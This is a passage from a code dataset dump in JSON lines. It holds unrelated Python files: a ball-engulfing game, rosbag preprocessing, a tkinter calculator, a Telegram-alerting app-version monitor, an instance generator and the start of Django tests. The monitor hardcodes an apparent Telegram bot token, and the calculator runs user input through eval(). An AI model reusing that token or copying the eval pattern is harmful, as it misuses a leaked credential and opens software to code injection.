`(player radius + mass radius) × (- player velocity / |player velocity|)` finds the opposite circumference which is the position of mass object. \n\n When player moves in the opposite direction, the velocity of the mass could become 0 which will cause error. \n An if statement checks if the `x` or `y` are 0 and increments if condition is met. #\n\n Once the calculation is complete, a mass object is added to the list. \n It takes the position calculated before, the negative velocity of player (opposite direction) and the colour. \n \n The player loses the mass which.\n Each move will cause the player to lose 1 from the radius. \n Each mass is 0.2 radii and 5 are created for each movement. \n \"\"\"\n mass_velocity: Vector = self.player.velocity.copy().negate() # Velocity of the mass is the opposite direction from the player, therefore velocity is negated. \n mass_radius: float = 0.2\n\n if (mass_velocity.get_p()[0] == 0): # Checks if the x component of the velocity is 0\n mass_velocity += Vector(1, 0) # Increment 1 to x component to avoid errors later on\n elif (mass_velocity.get_p()[1] == 0): # Checks if the y component of the velocity is 0\n mass_velocity += Vector(0, 1) # Increment 1 to y component to avoid errors later on\n\n mass_velocity_unit = mass_velocity.copy().divide(mass_velocity.length()) # Unit Vector = Vector / |Vector|\n mass_position = ((self.player.radius + mass_radius) * mass_velocity_unit) + self.player.position.copy() # Computes the actual position of the mass\n\n self.mass.append(Mass((mass_position), mass_velocity, mass_radius)) # Creates a new mass object which is added to the list\n self.player.set_radius(self.player.radius - mass_radius) # Decrements the radius of the player \n\n def update_enemy(self):\n \"\"\"Update the enemies. \n Method handles the updating the position of the enemies and bouncing upon collision with walls. \n To update the position of the enemy, the update method of the enemy object itself is called. \n Method also checks the state of the enemies by checking if there have been collisions (`hit()` method) with other enemies, mass or the player. \n When enemies get close to other enemies or mass, gravity is applied on the two objects. \n If there have been collisions that the appropriate ball is engulfed. \n \n Enemies are stored in a list of enemies. \n This means that each enemy is the list is handles individually by iterating over the list. \n A for loop is used to iterate over each enemy and carry out the operations and checks mentioned before. \n\n Calls:\n `Enemy.update()`: handles updating the position of the enemy object. \n `self.bounce(enemy)`: handles the updating the velocity of the enemy upon collision with wall. \n `self.hit(enemy, enemy2)`: detects collision of the enemy with another ball (enemy, player).\n `self.gravity(ball1, ball2)`: attracts two balls together. \n `self.engulf(enemy, enemy2)`: once there has been a collision, bigger ball will engulf the smaller ball. \n \"\"\"\n for enemy in self.enemy: # For each enemy object in the enemy list\n enemy.update() # Update the ball (moves the ball)\n self.bounce(enemy) # Bounce the ball if there is a collision \n \n #^ Checking Collision with Player\n if self.hit_ball(self.player, enemy): # Check if there has been a collision between player and enemy\n self.engulf(self.player, enemy) # If true, the one of the two objects is engulfed\n \n #^ Checking Collision with other Enemy\n for enemy2 in self.enemy: # Check collision with other enemies for each enemy in the list\n if enemy != enemy2: # Only execute when the two balls are different.#* Same balls are always colliding\n self.gravity(enemy, enemy2) # Gravity acts on the balls\n if self.hit_ball(enemy, enemy2): # Check if there has been a collision between 2 enemies\n self.engulf(enemy, enemy2) # If there has been a collision then engulf method is called\n\n #^ Checking Collision with Mass:\n for mass in self.mass: # For loop used to iterate over each mass object in the list\n self.gravity(enemy, mass) # Gravity acts on the mass and enemy\n if self.hit_ball(enemy, mass): # Check if there has been a collision between current mass and current enemy\n self.engulf(enemy, mass) # If true then mass is engulfed by the enemy\n\n def enemy_split(self):\n \"\"\"Splits the enemy objects into smaller ones. \n When the method is called, a random enemy will be split. \n This is done by splitting a selecting a random number from the first to last index from list where enemies are stored. \n If the radius is too small, then the enemy is not split. Otherwise, the enemies will become too small. \n\n When splitting, the enemy will become slower. \n To counter this, the velocity is multiplied. \n This also means that the new enemy will be faster. \n The enemies will get exponentially fast. \n A limiter is implemented so that the velocity is not increased once the speed (not velocity only magnitude) limit is reached. \n\n The radius of the new enemy object is random from range `5` to 5 less than the radius of the current enemy. \n The range cannot be too small otherwise the new enemy will be too small and the current enemy will not decrease that much. \n Once a radius is picked, the radius of the current enemy will be decreased by the same amount. \n\n The new enemy is spawned on the opposite side of the direction of the current enemy object. \n The formula `(current enemy radius + new enemy radius) × (-current velocity / |current velocity|)` finds the opposite circumference which is the position of new enemy object. \n\n When current enemy moves in the opposite direction, the velocity of the new enemy could become 0 which will cause error. \n An if statement checks if the `x` or `y` are 0 and increments if condition is met. \n\n Once the calculation is complete, a new enemy object is added to the list. \n It takes the position calculated before, the negative velocity of current enemy (opposite direction) and the radius. \n \"\"\"\n #^ Random Enemy:\n enemy: Enemy = self.enemy[random.randint(0, len(self.enemy) - 1)]\n \n #^ Splitting Enemy:\n if (enemy.radius >= 15): # Only splits when the radius is less than 15\n if (enemy.velocity.length() < 5): # Checks if the speed is less than 5\n enemy.velocity.multiply(1.5) # Multiply the speed 1.5 to supplement the decrease in speed \n \n mass_velocity: Vector = enemy.velocity.copy().negate() \n new_enemy_radius:int = random.randint(5, floor(enemy.radius - 5)) # New enemy radius is random\n\n if (mass_velocity.get_p()[0] == 0): # Checks if the x component of the velocity is 0\n mass_velocity += Vector(1, 0) # Increment 1 to x component to avoid errors later on\n elif (mass_velocity.get_p()[1] == 0): # Checks if the y component of the velocity is 0\n mass_velocity += Vector(0, 1) # Increment 1 to y component to avoid errors later on\n\n mass_velocity_unit: Vector = mass_velocity.copy().divide(mass_velocity.length()) # Unit Vector = Vector / |Vector|\n mass_position: Vector = ((enemy.radius + new_enemy_radius) * mass_velocity_unit) + enemy.position.copy() # Computes the actual position of the new enemy\n\n self.enemy.append(Enemy(mass_position, mass_velocity, new_enemy_radius)) # Creates a new enemy object which is added to the list\n enemy.set_radius(enemy.radius - new_enemy_radius) # Decrements the radius of the player \n \n def update_mass(self) -> None:\n \"\"\"Update the mass. \n Method handles updating the position of the mass and bouncing upon collision with walls. \n To update the position of the mass, the update method of the mass object itself is called. \n Method also checks the state of the mass by checking if there have been collisions (`hit()` method) with enemies or the player. \n Mass cannot engulf another mass to prevent mass from engulfing player and enemies. Mass is always engulfed. \n If there has been a collision, then the mass object is engulfed. \n \"\"\"\n for mass in self.mass: # For each mass object in the mass list\n mass.update() # Move the ball\n self.bounce(mass) # Bounce mass upon collision with wall\n \n if self.hit_ball(mass, self.player): # Check if there has been collision with player\n self.engulf(self.player, mass) # If true, then the player object will engulf the mass\n \n def update_power_ups(self) -> None:\n \"\"\"Checking of the power up object has collided with player object. \n A for loop is used to iterate over the list of powerups. \n For each power up object, it is checked whether there has been a collision. \n If there has a been a collision, then the player object receives a power up and the current power up object is removed from the list. \n Once the player receives the power up, the timer which defines how long it will last will be created. \n \"\"\"\n for power_up in self.power_ups: # Iterate over the power up objects in the list\n if self.hit_ball(self.player, power_up): # Check if the current power up has collided with player\n self.power_ups.remove(power_up) # Remove the power up from the list \n self.player.power_up = \"Speed\" # Makes the player faster\n self.player_power_up_timer.start() # Starts the timer for how long the power up lasts for\n\n def add_power_up(self) -> None:\n \"\"\"Creates power up objects. \n This is called from `self.power_up_timer_create` which will create a new power up at a set time interval. \n The maximum number of power ups is 5 after which point no more power ups will be added. \n An if statement is used if the number of power ups (in the list) is bellow the maximum limit. \n If it is bellow the limit, then new power up objects are spawned at random locations within the map. \n \"\"\"\n max_number_power_ups: int = 5\n if (len(self.power_ups) < max_number_power_ups): # Checks if the number of power ups in the map is less than the maximum allowed\n self.power_ups.append(Power_Up(Vector(random.randint(5, 790), random.randint(5, 490)))) # Create a new power up at a random place within the map\n\n def countdown(self):\n \"\"\"Counts down the timer set.\n This method decrements the time limit for the game. \n Each time this is called from `self.time_count` the time limit decreases. \n Other methods will check this `self.time_limit` to execute the required actions. \n \"\"\"\n self.time_limit -= 1\n\n def reset_player_power_up(self) -> None:\n \"\"\"Resets player power up. \n Called from `self.player_power_up_timer` timer. \n \"\"\"\n self.player.power_up = \"None\" # Reset the power up (no more power up)\n self.player_power_up_timer.stop() # Stops the timer (until a new power up is received) \n\n #^ Mechanics:\n def gravity(self, ball1: Ball, ball2: Ball) -> None:\n \"\"\"Gravity method attracts the smaller ball towards the bigger ball. \n The method compares the radii of the two balls to find out the smaller and larger ball. \n Gravity will act on the smaller ball when it is within a certain range of the bigger ball. \n The velocity of both balls changes. \n However, the velocity of the smaller ball changes more drastically than the bigger one. \n The gravitation force of the smaller ball on the lager one us 5 times weaker. \n\n Gravitational force dictates the strength of the gravity.\n The distance is computed by comparing the centers of the two balls which is used to check if smaller ball is within the range. \n\n Args:\n `ball1 (Ball)`: one of the balls on which gravity could act on.\n `ball2 (Ball)`: one of the balls on which gravity could act on.\n \"\"\"\n gravitational_force: int = 700 # Smaller means stronger\n distance_between_balls: int = int((ball1.position.copy().subtract(ball2.position)).length())\n larger_ball: Ball = ball1 \n smaller_ball: Ball = ball2 # Gravity acts on the smaller ball\n\n #^ Computing Larger & Smaller Ball\n if (ball1.radius < ball2.radius): # Works out the larger and smaller ball \n larger_ball: Ball = ball2\n smaller_ball: Ball = ball2\n gravity_distance: int = larger_ball.radius * 5\n \n #^ Gravity\n if (distance_between_balls < (gravity_distance)): # Gravity acts when the smaller ball is inside the gravitational range of the bigger ball\n smaller_ball.velocity.add((larger_ball.position - smaller_ball.position).divide(gravitational_force)) # Smaller ball velocity changed\n larger_ball.velocity.add((smaller_ball.position - larger_ball.position).divide(gravitational_force * 5)) # Bigger ball velocity changed (5 times weaker)\n \n def hit_ball(self, ball1: Ball , ball2: Ball) -> bool:\n \"\"\"Detects collision between 2 balls. \n Method computes the distance between the two centers of the balls. \n The distance is compared with the sum of the radii of the balls. \n If the distance between the centers is less than the sum of the radii then there has been a collision. \n \n Method will call engulf method to so that the larger ball will engulf the smaller ball. \n \n Args:\n `ball1 (Ball)`: enemy.\n `ball2 (Ball)`: can be enemy, player or mass.\n \n Returns:\n `(Boolean)`: whether a collision has occurred.\n \"\"\"\n distance: Vector = ball1.position.copy().subtract(ball2.position)\n return (distance.length() < (ball1.radius + ball2.radius)) # Check if the distance from the centres is less than the sum of radii \n\n def engulf(self, ball1: Ball, ball2: Ball) -> None:\n \"\"\"Engulf ball. \n After collision.\n The sum of the radii is computed and stored in variable to be set later. \n A fraction of the sum of radii is set to the ball as balls get large to quickly. \n \n If the second (smaller) ball is the enemy, \n then it is removed from the list. \n `self.increment_score()` is called to increment the score, \n this method checks whether the larger ball was the player and the smaller ball was the enemy. \n It is possible that both balls were enemies which means that the kill counter cannot be incremented. \n\n If the second (smaller) ball is player, \n then player is dead which means that the game is list. \n\n If the second (smaller) ball is the mass, \n then it is removed from the list. \n Mass will never eat another entity as mass does not get larger because it does not engulf other mass. \n \n Args:\n `ball1 (Ball)`: main ball.\n `ball2 (Ball)`: can be enemy or player.\n \n Calls:\n `Ball.set_radius(sum)`: increases the size of the ball by setting the sum of the two balls to the bigger one. \n `self.increment_score(larger_ball, smaller_ball)`: increments the score only if the player killed / engulfed the enemy. \n \"\"\"\n sum_radii: int = ball1.radius + ball2.radius\n larger_ball: Ball = ball1 \n smaller_ball: Ball = ball2 \n\n #^ Computing Larger & Smaller Ball\n if (ball1.radius < ball2.radius): # Works out the larger and smaller ball \n larger_ball = ball2\n smaller_ball = ball1\n\n #^ Erasing Engulfed Ball\n larger_ball.set_radius(sum_radii) # Fraction of the sum of the balls set to ball 1\n \n if (smaller_ball.type == \"Enemy\"): # If the ball eaten (smaller ball) was the enemy\n self.enemy.remove(smaller_ball) # The ball is removed from enemy list\n self.increment_score(larger_ball, smaller_ball) # If larger ball is the player and smaller ball is the enemy then the score is incremented\n elif (smaller_ball.type == \"Player\"): # If the ball eaten (smaller ball) was the player\n self.player.alive = False # A method will check this and terminate the game \n elif (smaller_ball.type == \"Mass\"): # Mass is removed from list\n self.mass.remove(smaller_ball)\n\n def bounce(self, ball: Ball) -> None:\n \"\"\"Bounces the ball if there was a collision with the wall. \n The maximum distance is from the center of the ball to the center of the wall. \n The distance between the center and wall is computed to check if there was a collision. \n If the distance between the wall and the ball is less than the maximum distance then there has been a collision. \n\n `in_collision` variable keeps track of whether there has been a collision before. \n This is done to prevent the sticky problem where the ball is stuck in the wall. \n If there is a previous collision and another one happens at the same time, then collision is not handles therefore no bounce. \n After the collision takes place and there is no other collision, then the variable is set to false so that the next collision can be handled. \n \n The ball is the super-class of enemy, player and mass.\n This method will work for any dub-classes of ball. \n \n Args:\n `ball (Ball)`: ball object which moves.\n \n Calls: \n `Line.distance(ball)`: works out the distance between the ball object (player, enemy). \n `Ball.bounce(line.normal)`: reflect the velocity of the ball along normal to simulate a bounce. \n \"\"\"\n for line in self.lines: # For each line in the line list\n distance = ball.radius + (line.thickness / 2) + 1 # Sum of the wall thickness and wall size (radius)\n if (line.distance(ball) < distance) and (ball.in_collision == False): # Collision: if the current distance of center of ball and wall is less than the minimum distance and collision not dealt with\n ball.bounce(line.normal) # Call the bounce method from ball object\n ball.in_collision = True # Collision already dealt with therefore no sticky problem\n else: # Where there is no collision\n ball.in_collision = False # When there is no collision then set to false so that bounce can happen later\n\n #^ Game:\n def increment_score(self, larger_ball: Ball, smaller_ball: Ball) -> None:\n \"\"\"Increments the score if the player engulfs / kills an enemy. \n This method called from `self.engulf()` where the larger ball engulfs the smaller ball upon collision. \n The score is incremented if the player kills the enemy. \n For this to happen, the larger balls must be the player and the smaller ball must be the enemy. \n\n An if statement is used to check the type of the two balls. \n if the larger ball (which engulfed / killed) is the player and \n smaller ball (which was engulfed / killed) is the enemy then \n the score is incremented. \n\n This check is carried out because it is possible that both balls were enemies. \n In this case, the kill counter cannot be incremented as the player has not killed any enemies but rather the enemies have merged. \n\n Args:\n larger_ball (Ball): larger ball which has engulfed the smaller ball. \n smaller_ball (Ball): smaller ball which is engulfed / killed by the bigger ball. \n \"\"\"\n if (larger_ball.type == \"Player\") and (smaller_ball.type == \"Enemy\"): # Only if player engulfed the larger enemy (from `self.engulf()` method)\n self.kill_counter += 1 # Increment kill counter to be displayed on canvas on another method\n \n def game_finish(self) -> None:\n \"\"\"Handles the end of game.\n Detects whether the game is finished. \n Once the game is finished, the game will be terminated and the appropriate message will be displayed. \n This is done by checking whether all the enemies are dead or the player is dead. \n \n To check if all the enemies are dead, the size of the list which contains the enemies us checked.\n If the length of the list is 0 (empty list) then all the enemies are dead and the player has won. \n\n To check if the player is dead, the field which keeps track if it alive is checked. \n If the field 'alive' is false, then the player is dead and therefore has lost. \n\n The player will lose if the it has not killed all the enemies by the time the timer runs out. \n When the timer reaches 0, the timer has run out. \n For the timer to be unlimited, the timer is set to be less than 0 (-1) which means that the condition is never met. \n\n Checks whether the letter 'e' has been pressed. \n If it has been pressed, the game will be terminated. \n\n Calls:\n `stop()`: terminates the game and all the handlers (timer, frame).\n \"\"\"\n if (len(self.enemy) == 0): # Checks if all the enemies are dead\n self.stop()\n print(\"You Won\")\n elif (self.player.alive == False): # Checks if the player is dead\n self.stop()\n print(\"Game Over. You Lost.\")\n elif (self.time_limit == 0): # Checks if the timer has ran out\n print(\"Ran Out of Time. You Lost\")\n self.stop()\n elif (self.keyboard.e): # Checks if player exited the game by pressing 'e'\n print(\"Game Exited\")\n self.stop()\n\n def stop(self) -> None:\n \"\"\"Terminates all the handlers.\n All the timers and the frame are terminated. \n This terminates the game. \n \"\"\"\n self.frame.stop()\n self.power_up_timer_create.stop()\n self.time_count.stop()\n self.player_power_up_timer.stop()\n self.enemy_split_timer.stop()\n\n# A bug is present where the enemies will infinitely get larger if the plater is eaten.\n# Terminating the game is a workaround. ","repo_name":"mbeps/Osmos_Game","sub_path":"Game_Control/interactions.py","file_name":"interactions.py","file_ext":"py","file_size_in_byte":36236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"31728619215","text":"import os\nimport numpy as np\nimport rosbag\nimport rospy\nimport matplotlib.pyplot as plt\nfrom plot_bag import *\n\ndef get_start_time(bag):\n t_prev = 0\n pos_prev = []\n count = 0\n t_start = 0\n\n for topic, msg, t in bag.read_messages('/tf'):\n if msg.transforms[0].child_frame_id == \"Puck\":\n pos = np.array([msg.transforms[0].transform.translation.x, msg.transforms[0].transform.translation.y, msg.transforms[0].transform.translation.z])\n t_sec = msg.transforms[0].header.stamp.to_sec()\n if t_prev != 0:\n vel = np.linalg.norm(pos - pos_prev) / np.abs(t_sec - t_prev)\n if vel > .06:\n if count == 0:\n t_start = t\n count += 1\n if count > 5:\n return t_start\n else:\n count = 0\n pos_prev = pos\n t_prev = t_sec\n\ndef write_in_bag(bag_origin, bag_write:rosbag.Bag, t_start):\n count = 0\n for topic, msg, t in bag_origin.read_messages(\"/tf\", t_start):\n time_stamp = rospy.Time(0) + (t - t_start) # create time instance with rospy.Time\n msg.transforms[0].header.stamp = time_stamp\n bag_write.write(topic, msg, time_stamp)\n count += 1\n bag_write.close()\n\n\n\nif __name__ == \"__main__\":\n\n bag_dir = \"/home/hszlyw/Documents/airhockey/20210224/long_side/\"\n dir_list = os.listdir(bag_dir)\n dir_list.sort()\n filenames = []\n for filename in dir_list:\n filenames.append(filename)\n # if not os.path.exists(bag_dir + \"edited\"):\n # os.mkdir(bag_dir + \"edited/\")\n for bag_name in filenames:\n # if bag_name == 'edited':\n # continue\n\n\n bag_name = \"2021-02-24-15-00-42.bag\"\n print(bag_name)\n\n bag = rosbag.Bag(os.path.join(bag_dir, bag_name))\n\n # write_obj = rosbag.Bag(os.path.join(bag_dir + \"edited\", bag_name), 'w')\n write_obj = rosbag.Bag(os.path.join(\"/home/hszlyw/Documents/airhockey/20210224/long_edited/\", bag_name), 'w')\n\n t_start = get_start_time(bag)\n # print(t_start.to_sec() - bag.get_start_time())\n write_in_bag(bag, write_obj, t_start)\n bag_after = rosbag.Bag(os.path.join(\"/home/hszlyw/Documents/airhockey/20210224/long_edited/\", bag_name))\n\n\n plotbag(bag, 'before')\n plotbag(bag_after, 'after')\n plt.legend()\n plt.show()\n None\n","repo_name":"Aniccam/System-Identification-in-Robot-Air-Hockey","sub_path":"iiwa_envs/dataprocessing/pre_process.py","file_name":"pre_process.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39382720933","text":"import tkinter as tk\nimport math\n\nbotao_config = {\n 'bg': '#242742',\n 'fg': '#d1d2de',\n 'font': ('Consolas bold', 12),\n 'height': '2',\n 'width': '7',\n 'relief': 'flat',\n 'activebackground': '#313454'\n}\n\ndigitos = ['√', 'x²', 'C', 'π!', 'sin', 'π',\n 'cos', 'tan', 'sin‾¹', 'cos‾¹', 'tan‾¹']\n\ndeg = 1\ninversa_deg = 1\ncnt = 0\n\n\nclass Calculadora:\n def __init__(self, master):\n self.master = master\n\n self.displayFrame = tk.Frame(self.master)\n self.displayFrame.pack()\n\n self.buttonsFrame = tk.Frame(self.master)\n self.buttonsFrame.pack()\n\n self.output = tk.Entry(self.displayFrame,\n width=30,\n relief='sunken',\n bd=3,\n font=('Consolas bold', 17),\n fg=\"#c9c9c5\",\n bg=\"#242742\")\n self.output.grid(row=0, column=0)\n self.criarBotoes()\n\n self.converte = tk.Button(self.displayFrame,\n botao_config, width=3, height=0, text='DEG',\n bg='#e35124', command=self.degreesRadian)\n\n self.converte.grid(row=0, column=1)\n\n self.criarBotoes()\n\n def criarBotoes(self):\n self.botoes = [\n ['√', 'x²', '**', '(', ')', '/'],\n ['sin', 'cos', '7', '8', '9', '+'],\n ['sin‾¹', 'cos‾¹', '4', '5', '6', '-'],\n ['tan', 'tan‾¹', '1', '2', '3', '*'],\n ['π!', 'π', '.', '0', '=', 'C']\n ]\n for linha in range(len(self.botoes)):\n for coluna in range(len(self.botoes[linha])):\n texto = self.botoes[linha][coluna]\n\n b = tk.Button(self.buttonsFrame, botao_config, text=texto,\n command=lambda x=texto: self.acaoBotoes(x))\n b.grid(row=linha, column=coluna)\n\n def acaoBotoes(self, texto):\n global deg\n global inversa_deg\n if texto != '=':\n if texto not in digitos:\n self.output.insert('end', texto)\n else:\n if texto == '√':\n self.addValor(math.sqrt(float(self.output.get())))\n elif texto == 'π!':\n self.addValor(math.factorial(float(self.output.get())))\n elif texto == 'x²':\n self.addValor(float(self.output.get()) ** 2)\n elif texto == 'C':\n self.addValor('')\n elif texto == 'π':\n self.addValor(3.1415926535897932)\n elif texto == 'sin':\n self.addValor(math.sin(float(self.output.get()) * deg))\n elif texto == 'cos':\n self.addValor(math.cos(float(self.output.get()) * deg))\n elif texto == 'tan':\n self.addValor(math.tan(float(self.output.get()) * deg))\n elif texto == 'sin‾¹':\n self.addValor(\n math.asin(float(self.output.get()) * inversa_deg))\n elif texto == 'cos‾¹':\n self.addValor(\n math.acos(float(self.output.get()) * inversa_deg))\n elif texto == 'tan‾¹':\n self.addValor(\n math.atan(float(self.output.get()) * inversa_deg))\n\n else:\n self.addValor(eval(self.output.get()))\n\n def addValor(self, valor):\n self.output.delete(0, 'end')\n self.output.insert('end', valor)\n\n def degreesRadian(self):\n global deg\n global inversa_deg\n global cnt\n\n if(cnt == 0):\n deg = math.pi / 180\n inversa_deg = 180 / math.pi\n self.converte['text'] = 'RAD'\n cnt = 1\n else:\n deg = 1\n inversa_deg = 1\n self.converte['text'] = 'DEG'\n cnt = 0\n\n\nraiz = tk.Tk()\n\nCalculadora(raiz)\n\nraiz.mainloop()\n","repo_name":"LucasGola/Basic-Scientific-Calculator-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"9338533333","text":"import requests\r\nimport re\r\nimport filecmp\r\nimport time\r\nimport json\r\nfrom apscheduler.schedulers.blocking import BlockingScheduler\r\nimport urllib\r\n\r\nfrom telegram import Bot\r\n#telegram机器人消息发送函数\r\ndef bot_function(a,message):\r\n bot = Bot(token=\"797169015:AAFV4OCUhrr3_QY1_aQjW1e7vX4W0rkjOgI\")\r\n # -242222752为技术监控群\r\n #-288137810为机器人测试群\r\n bot.send_message(-288137810,a,message)#-242222752为技术监控群\r\nimport os\r\n# def job():\r\nwhile True:\r\n url_base_list = ['https://images.slaxc.com/app/api/x999_ios.js','https://images.slaxc.com/app/api/88yh_ios.js',\r\n 'https://images.slaxc.com/app/api/999y_ios.js','https://images.slaxc.com/app/api/77js_ios.js',\r\n 'https://images.slaxc.com/app/api/999h_ios.js']\r\n #print('begin')\r\n for url_base in url_base_list:\r\n time.sleep(1)\r\n html = requests.get(url_base)\r\n version = html.text\r\n link = re.findall(r'https://[a-zA-Z0-9.?/&_&-:]*',version)\r\n for li in link:\r\n time.sleep(1)\r\n message1 = requests.get(li).text\r\n filename1 = li.split(\"/\")\r\n #print(filename1)\r\n fileame = filename1[len(filename1) - 1 ]\r\n #print(fileame)\r\n filepath = fileame + '.txt'\r\n f = open(filepath,'w')\r\n f.write(message1)\r\n f.close()\r\n if os.path.exists(filepath):\r\n new_filepath = fileame + 'a' + '.txt'\r\n f = open(new_filepath,'w')\r\n f.write(message1)\r\n f.close()\r\n result = filecmp.cmp(filepath,new_filepath)\r\n if result == True:\r\n os.remove(new_filepath)\r\n else:\r\n bot_function(new_filepath,'检测到手机版本异常,请及时处理')\r\n\r\n# scheduler = BlockingScheduler()\r\n# scheduler.add_job(job,'interval',seconds=300)\r\n# scheduler.start()\r\n\r\n\r\n","repo_name":"myself521/study","sub_path":"app_monitor.py","file_name":"app_monitor.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"36823371613","text":"import os\n\nfrom dynaff.inputs import rndtree_metric\nimport numpy as np\nimport argparse\nimport sys\nfrom pathlib import Path\n\n\nclass CreateGenerators:\n \"\"\"\n Create Random Number Generators\n\n :param N: Number of Instances generated\n :param Load: Selection fLag for load on experiment or create one\n :param grid: Array of Total Tree Nodes [10 20 30]\n :param n_seeds: Number of existing experiment seeds\n :param exp_selected: Selected Experiment\n \"\"\"\n def __init__(self, grid, N, Load, defpath=None):\n self.N = N\n self.Load = Load\n self.grid = grid\n self.n_seeds = 0\n self.exp_selected = 0\n\n if defpath is None:\n path = Path.cwd() / 'Experiments' / \"Seeds\"\n else:\n path=Path(defpath)\n\n # Generate a Seed_Sequence with default entropy\n if self.Load in ('no', 'false', 'f', 'n', '0'):\n self.rnd_sq = np.random.SeedSequence()\n with open(path, 'r') as fp:\n self.n_seeds = len(fp.readlines())\n print(\"Generating New Seed Sequence: {s}\".format(s=self.rnd_sq.entropy))\n # Select from current seed directory to reproduce experiment\n else:\n print(\"Loading a Seed Sequence\")\n if not path.exists() or not path.is_file():\n raise ValueError('Experiment Path either does not exists or is not a File')\n file = open(path, 'rt')\n # Display Seeds with their selection index\n f = file.readlines()\n for line in f:\n print(line)\n self.n_seeds += 1\n file.close()\n\n while True:\n select = int(input(\"Insert index for desired seed to reproduce experiment: \"))\n self.exp_selected = select\n if select >= 0 and select < self.n_seeds:\n break\n print('Error: {} is not a valid option, please try again'.format(select))\n print(\"\\nYou have selected experiment: {}\".format(f[select]))\n\n self.grid = f[select].split()[2]\n self.N = int(f[select].split()[3])\n self.rnd_sq = np.random.SeedSequence(int(f[select].split()[1]))\n\n grid_ = [int(element) for element in self.grid.split(\",\")]\n self.experiments = len(grid_)\n self.total_instances = self.experiments * self.N\n\n def Create(self):\n children = self.rnd_sq.spawn(self.total_instances) # Spawn children for every instance\n generators = [np.random.default_rng(s) for s in children] # Create default generators for each instance\n return generators, self.rnd_sq, self.grid, self.N, self.n_seeds, self.exp_selected\n\n\ndef argParser(args):\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\\\n Generate Experiment Instances or Load a seed to reproduce \n previously created instances.\n ''',\n epilog='''python InstanceGenerator.py -l f -g 10,20,30,40 -s 5'''\n )\n\n parser.add_argument(\n '--load', '-l', type=str,\n help=\"Load Experiments or Create New One\")\n parser.add_argument(\n '--grid', '-g', type=str,\n help=\"Set of experiments Tree size\")\n parser.add_argument(\n '--size', '-s', type=int,\n help=\"Number o instances for each node size\")\n\n return parser.parse_known_args(args)[0]\n\n\nif __name__ == '__main__':\n args = argParser(sys.argv[:])\n Generator = CreateGenerators(args.grid, args.size, args.load)\n rnd_generators, sq, grid, N, n_seeds, exp_selected = Generator.Create()\n\n # Create New Experiment and save seed for reproducibility\n if args.load in ('no', 'false', 'f', 'n', '0','False'):\n # Experiment save example: [5 3435464535 10,20,30 10]\n exp_string = str(n_seeds) + \" \" + str(sq.entropy) + \" \" + str(grid) + \" \" + str(N) + \"\\n\"\n fle = Path('Experiments/Seeds')\n # Create seed file if not exist\n fle.touch(exist_ok=True)\n # Write Experiment string\n seeds_file = open(fle,'a')\n seeds_file.write(exp_string)\n seeds_file.close()\n # Create Master Experiment Path if is new\n n_experiments = len(next(os.walk('Experiments'))[1]) # Get number of next number of experiment\n master_path = \"Experiments/Experiment_\" + str(n_experiments)\n if os.path.exists(master_path) == False:\n os.mkdir(master_path)\n else:\n master_path = \"Experiments/Experiment_\" + str(exp_selected)\n if os.path.exists(master_path) == False:\n os.mkdir(master_path)\n\n\n # Convert grid string to array\n grid = [int(element) for element in grid.split(\",\")]\n\n # Experiment Environment Parameters\n exp_config = {}\n exp_config['experiment'] = {}\n exp_config['experiment']['env_type'] = 'rnd_tree'\n exp_config['experiment']['env_metric'] = 'metric'\n exp_config['experiment']['instances'] = N\n # Configurable Experiment Parameters\n exp_config['experiment']['scale'] = 7\n exp_config['experiment']['root_degree'] = 3\n exp_config['experiment']['Env_Update'] = 1\n exp_config['experiment']['delta'] = [.25,.50] # [A,B] We want agent at a distance between A% - B% of total scale\n ############################################\n c = 0\n # Create N instances for each Tree Size Experiment in Grid\n for n_nodes in grid:\n node_path = master_path + \"/\" + 'Size_' + str(n_nodes) + '/'\n if not os.path.exists(node_path):\n os.mkdir(node_path)\n file = 'img_' + str(n_nodes)\n batch_generators = rnd_generators[c:c + N] # Partition Generators total/N\n input = rndtree_metric(exp_config, node_path, file, n_nodes, batch_generators)\n c += N","repo_name":"MauMontenegro/Firefighter_Problem","sub_path":"InstanceGenerator.py","file_name":"InstanceGenerator.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73801419766","text":"from socket import *\nimport struct\nimport time\n\nhost = 'localhost'\nport = 123\n\nsock = socket(AF_INET, SOCK_DGRAM)\nsock.sendto(b'',(host, port))\ndata = sock.recvfrom(1024)\nt = struct.unpack(\">q\",data[0])[0]\nprint(time.localtime(t))","repo_name":"Egorrko/Net","sub_path":"2_task/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12385420935","text":"from turtle import Turtle\r\nFONT = (\"Arial, 40, normal\")\r\nALIGNMENT = \"center\"\r\n\r\nclass Banner(Turtle):\r\n def __init__(self, score):\r\n super.__init__()\r\n self.score = score\r\n \r\n def game_over(self):\r\n if self.score == 50:\r\n self.write(arg=\"You know your states!\", font=FONT, align=ALIGNMENT)\r\n else:\r\n self.write(arg=f\"You got {self.score} of the states!\", font=FONT, align=ALIGNMENT)","repo_name":"adewong-dotcom/Python","sub_path":"US_States_Game/banner.py","file_name":"banner.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1780480686","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom task_manager.forms import (\n PositionSearchForm,\n TaskSearchForm,\n TaskTypeSearchForm,\n WorkerCreationForm,\n WorkerSearchForm,\n WorkerUpdateForm\n)\n\nfrom task_manager.models import Position, Task, TaskType\n\n\nclass WorkerTests(TestCase):\n def setUp(self) -> None:\n self.position = Position.objects.create(\n name=\"Developer\"\n )\n\n self.form_data = {\n \"username\": \"test_user\",\n \"password1\": 